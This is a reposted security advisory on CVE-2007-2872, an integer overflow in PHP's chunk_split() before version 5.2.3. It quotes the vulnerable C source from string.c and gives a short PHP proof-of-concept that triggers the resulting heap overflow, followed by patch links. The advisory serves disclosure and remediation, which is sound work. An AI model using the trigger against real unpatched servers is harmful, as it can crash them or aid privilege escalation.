Analysis of integer overflow vulnerability in chunk_split() function under PHP5.2_PHP Tutorial

Affected systems:
PHP PHP < 5.2.3
Unaffected systems:
PHP PHP 5.2.3
Description:
------------ -------------------------------------------------- ------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872

PHP is a popular WEB server-side programming language.

The chunk_split function in PHP has an integer overflow vulnerability when processing malformed parameters. Local attackers may use this vulnerability to escalate their own privileges.

Line 1963 of the chunk_split function in PHP attempts to allocate sufficient memory size for the function result, but uses the srclen and chunklen parameter blocks without performing any checks. If the block and endlen of the value are larger than 65534 bytes, an integer overflow will be triggered and the wrong memory size will be allocated, causing a heap overflow.

ext/standard/string.c：

1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen ;
1971 }

<*Source: Gerhard Wagner

Link: http://marc.info/?l=bugtraq&m=118071054000708&w=2
http:// www.php.net/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>

Test method:
------ -------------------------------------------------- --------------------------

Warning

The following procedures (methods) may be offensive and are only for For security research and teaching purposes. Use at your own risk!

<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

Suggestion:
--------------------- -------------------------------------------------- ----------
Manufacturer patch:

PHP
---
Currently, the manufacturer has released an upgrade patch to fix this security issue. Please go to the manufacturer's homepage to download it. ：

http://www.php.net/downloads.php#v5

Article from: NSFOCUS Technology

http://www.bkjia.com/PHPjc/318299.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/318299.htmlTechArticleAffected systems: PHP PHP 5.2.3 Unaffected systems: PHP PHP 5.2.3 Description: --- -------------------------------------------------- ----------------------------- BUGTRAQ ID: 24261 CVE...